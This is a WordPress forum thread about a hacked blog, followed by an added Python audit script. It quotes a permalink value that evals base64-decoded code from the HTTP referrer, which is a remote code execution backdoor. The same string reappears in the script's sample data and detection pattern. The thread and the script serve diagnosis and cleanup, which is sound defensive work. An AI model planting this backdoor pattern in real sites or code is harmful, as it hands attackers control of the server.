I thought if I was hacked my site wouldn’t be there, or would redirect to a porn site, or be full of adverts for performance-enhancing drugs.
What is this telling you to make you think it’s been hacked:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Trying to learn this stuff so thanks for the feedback. 🙂
Because that is a typical hack – it probably worked silently until you maybe upgraded, changed permalinks or some plugin that works with permalinks, or something server-side changed.
If you have ads, it could be the company providing them.
I’m no expert, but I think the basic idea with this sort of hack is that your server will execute whatever code is passed to it through the browser referrer string.
Normally this referrer would be the webpage the visitor came from to get to your site, but the hacker could manipulate this and change the referrer string to be malicious code and your server will execute it without question – i.e. the hacker can add spam links, steal passwords, add files, add hidden administrators so they can come back even when you’ve seemingly fixed the problem, etc. It does also change all your URLs which lead to 404s/server errors, so it’s not exactly subtle stuff.
I seem to remember this vulnerability was fixed back around 2.8.x ish, so there’s a good chance you’ve been hacked for a while. Check the total number of admins is correct… and follow the links above.
Ya, we haven’t logged into this blog for a couple of months as we’re deciding what direction to take with the main site.
I did just delete a couple of “admins” who had added themselves. How do we keep this from happening? I don’t see anything in the General Settings to address this.
Thanks all!!
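An added example, not part of the original thread: a small audit of the two things discussed above, the permalink structure value and the list of administrators. It assumes the default `wp_` table prefix, that you have exported the `permalink_structure` option and the `wp_capabilities` user meta rows yourself, and the account names are constructed sample data.

```python
import re

# Structure tags WordPress core accepts in a permalink structure.
KNOWN_TAGS = {"%year%", "%monthnum%", "%day%", "%hour%", "%minute%",
              "%second%", "%post_id%", "%postname%", "%category%", "%author%"}
# Strings that belong in PHP source, never in a URL pattern.
CODE_MARKERS = re.compile(r"eval\s*\(|base64_decode|\$_SERVER|\$\{", re.I)
TAG = re.compile(r"%[^%/]*%")
SAFE_LITERAL = re.compile(r"[A-Za-z0-9/_.\-]*")


def audit_permalink(value):
    """Return findings for one permalink_structure option value."""
    findings = []
    if CODE_MARKERS.search(value):
        findings.append("php-code-marker")
    # Plugins can register extra tags, so an unknown tag is a prompt to
    # review the value by hand, not proof of compromise on its own.
    if any(tag not in KNOWN_TAGS for tag in TAG.findall(value)):
        findings.append("unknown-tag")
    if not SAFE_LITERAL.fullmatch(TAG.sub("", value)):
        findings.append("unexpected-characters")
    return findings


def unexpected_admins(capability_rows, expected_logins):
    """capability_rows: (user_login, wp_capabilities meta_value) pairs.

    The meta value is a PHP-serialized array; an administrator has the
    key "administrator" set to true (b:1).
    """
    admins = {login for login, caps in capability_rows
              if '"administrator";b:1' in caps}
    return sorted(admins - set(expected_logins))


# The value quoted in this thread, plus constructed sample data.
PAGE_VALUE = "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/"
CLEAN_VALUE = "/%year%/%monthnum%/%postname%/"
ROWS = [("siteowner", 'a:1:{s:13:"administrator";b:1;}'),
        ("guest_writer", 'a:1:{s:6:"author";b:1;}'),
        ("newadmin01", 'a:1:{s:13:"administrator";b:1;}')]

if __name__ == "__main__":
    print(audit_permalink(PAGE_VALUE))
    print(audit_permalink(CLEAN_VALUE))
    print(unexpected_admins(ROWS, ["siteowner"]))
```

Any finding on the permalink value, or any login returned by `unexpected_admins`, means the site should be treated as compromised and cleaned up rather than just having the one setting reset.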